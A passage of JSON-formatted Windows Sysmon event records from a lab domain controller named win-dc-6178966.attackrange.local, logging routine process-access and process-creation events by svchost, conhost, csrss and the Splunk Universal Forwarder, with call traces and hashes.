{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3646,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3647,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3648,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3649,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3650,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.408\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-00100F960500}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.408","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-00100F960500}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3651,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.519\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-0010CB970500}\r\nProcessId: 1212\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.519","ProcessGuid":"{41C8662E-1FF7-5F25-0000-0010CB970500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3652,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010CB970500}\r\nTargetProcessId: 1212\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010CB970500}","TargetProcessId":"1212","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3653,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010CB970500}\r\nTargetProcessId: 1212\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 